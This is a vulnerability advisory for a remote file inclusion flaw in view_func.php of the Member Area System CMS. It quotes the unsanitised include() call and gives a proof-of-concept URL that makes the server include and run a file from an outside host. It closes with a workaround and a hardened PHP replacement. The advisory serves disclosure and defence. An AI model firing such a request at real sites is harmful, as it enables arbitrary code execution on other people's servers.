Member Area System (MAS) Remote File Include Vulnerability (view_func.php)

----------------------------------------------------------------------

Member Area System (MAS) Remote File Include Vulnerability (view_func.php)

----------------------------------------------------------------------

Author: ShipNX
Impact: Remote file include
Status: Patch not available

----------------------------------------------------------------------

Software description:

Name: Member Area System (MAS)
Version: The vendor has not disclosed version information since v1.7.
Later versions are probably also vulnerable.
Vendor: Mansion Productions
Vendor homepage: http://www.mansionproductions.com/
Software homepage: http://www.mansionproductions.com/mas/

Description:
MAS is a leading content management system (CMS) designed specifically
for managing adult-oriented sites. It is used on many major adult
sites around the world.

----------------------------------------------------------------------

Vulnerability:

Code: view_func.php

...
$path=dirname($i).'/';
include($path.$l.'/'.'filelist.mas');
...

The variables $i and $l are not sanitized before being used to build the
path passed to include(). If register_globals = On and allow_url_include
(allow_url_fopen in older PHP releases) = On, an attacker can send a
crafted request that leads to remote file inclusion and therefore to
arbitrary code execution on the web server.

---------------------------------------------------------------------

POC:

Conditions:
Register Globals = On
Allow URL fopen (Allow URL include since PHP 5.2.0) = On

http://affectedsite.com/view_func.php?i=http://remotesite.com/justsomedir/&l=testfile.txt?

Note:

justsomedir/ is required here because the value passed via $i first goes
through dirname(), which produces

$path='http://remotesite.com/';

The remote file should therefore be placed at http://remotesite.com/testfile.txt

----------------------------------------------------------------------

Workaround:

The vendor has been aware of the vuln for ages (probably since 2006), so they
recommend setting Register Globals = Off. Not sure why they haven't
patched the vuln already. If Register Globals is Off on your server, then
you are more or less secure. If it is On, ask your system administrator
to turn it Off. If for some reason you need Register Globals = On on your
site (using old software etc.), then contact the vendor and MAYBE they will
finally patch the bug :-)
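
Turning register_globals off only removes the delivery vector; the include itself stays unsafe as long as the path is built from request data. The following is an added example of what a hardened view_func.php include could look like; it is not MAS code and not the vendor's patch, and the base directory name, the module parameter and the function name are assumptions.

```php
<?php
// Added example, not code from MAS. Hardened replacement for the
// include shown in the advisory. The original concatenated the
// request-controlled $i and $l into the include path; here $i is not
// used at all, and the one remaining user value ($l, the module name)
// must pass a strict allow-list check and a containment check.
declare(strict_types=1);

// Assumption: member modules live under this directory (hypothetical path).
const MAS_BASE_DIR = __DIR__ . '/members';

// Returns the absolute path of <module>/filelist.mas, or null if the
// module name is not acceptable or resolves outside MAS_BASE_DIR.
function resolveFilelist(string $module): ?string
{
    // Only a plain directory name is allowed: no slashes, dots, colons
    // or NUL bytes, so "http://..." and "../" never reach the filesystem.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $module)) {
        return null;
    }
    $base   = realpath(MAS_BASE_DIR);
    $target = realpath(MAS_BASE_DIR . '/' . $module . '/filelist.mas');
    if ($base === false || $target === false) {
        return null; // base dir missing or module has no filelist.mas
    }
    // realpath() has followed symlinks; confirm the resolved file still
    // sits below the base directory before handing it to include().
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Read the module name explicitly from the request instead of relying
// on register_globals to populate $l.
$module   = (string) ($_GET['l'] ?? '');
$filelist = resolveFilelist($module);
if ($filelist === null) {
    http_response_code(400);
    exit('invalid module');
}
include $filelist;
```

With this shape the request from the POC section (i=http://remotesite.com/justsomedir/&l=testfile.txt?) is rejected at the preg_match() check, and setting allow_url_include = Off in php.ini remains a worthwhile second layer.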
=0D
----------------------------------------------------------------------

History:

Vuln found: Late 2005 :-))
Vendor notified: It seems the vendor has known of the vuln since 2006, but
for some reason fails to patch it. Maybe they just want to keep it
quiet, or maybe security matters just don't bother them - not sure.
Anyway, maybe this advisory will finally force them to do the patching :-))
Advisory: 11/01/2008

----------------------------------------------------------------------

Thanks to:

DeZender creators :-)